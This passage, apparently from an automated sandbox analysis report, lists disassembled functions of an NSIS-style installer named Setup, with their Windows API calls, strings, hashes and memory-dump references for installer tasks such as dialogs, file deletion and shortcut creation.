Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4

Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE

Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C

Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09

Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

Non-executed Functions

Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 004049BF
GetDlgItem.USER32(?,00000408), ref: 004049CC
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
LoadBitmapW.USER32(0000006E), ref: 00404A2E
SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
DeleteObject.GDI32(?), ref: 00404AA5
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
ShowWindow.USER32(?,00000005), ref: 00404BFB
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
ImageList_Destroy.COMCTL32(?), ref: 00404DC8
GlobalFree.KERNEL32(?), ref: 00404DD8
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
ShowWindow.USER32(?,00000000), ref: 00404F75
GetDlgItem.USER32(?,000003FE), ref: 00404F80
ShowWindow.USER32(00000000), ref: 00404F87

Strings

, xrefs: 00404F65
M, xrefs: 00404B6F
N, xrefs: 00404C32
@, xrefs: 00404BBC

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58

Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
lstrlenW.KERNEL32(?), ref: 00406D58
FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
FindClose.KERNEL32(?), ref: 00406E5F

Strings

RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
Delete: DeleteFile failed("%s"), xrefs: 00406E29
Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
Delete: DeleteFile("%s"), xrefs: 00406DE8
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
\*.*, xrefs: 00406D2F
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
ptF, xrefs: 00406D1A

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
API String ID: 2035342205-1650287579
Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE

Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 00404525
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
GetDlgItem.USER32(?,000003FB), ref: 00404553
GetAsyncKeyState.USER32(00000010), ref: 0040455A
GetDlgItem.USER32(?,000003F0), ref: 0040456F
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
SetWindowTextW.USER32(?,?), ref: 004045AF
SHBrowseForFolderW.SHELL32(?), ref: 00404669
lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
CoTaskMemFree.OLE32(00000000), ref: 00404674

Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB

GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424576,74DF23A0,00000000), ref: 00406902

SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819

Strings

F, xrefs: 004046A0
A, xrefs: 00404662

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: F$A
API String ID: 3347642858-1281894373
Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59

Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
lstrcmpA.KERNEL32(name,?), ref: 00406FF3
CloseHandle.KERNEL32(?), ref: 00407212

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

name, xrefs: 00406FEB
GetTTFNameString, xrefs: 00406F33
%s: failed opening file "%s", xrefs: 00406F38

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75

Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424576,74DF23A0,00000000), ref: 00406902
GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00424576,74DF23A0,00000000), ref: 00406A73

Strings

F, xrefs: 00406858
F, xrefs: 00406A7F
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406A0B
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406952

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-1792361021
Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54

Function 004079A2 Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95

Function 0040737E Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85

Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
lstrlenW.KERNEL32(?), ref: 004063F8
GetVersionExW.KERNEL32(?), ref: 00406456

Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D

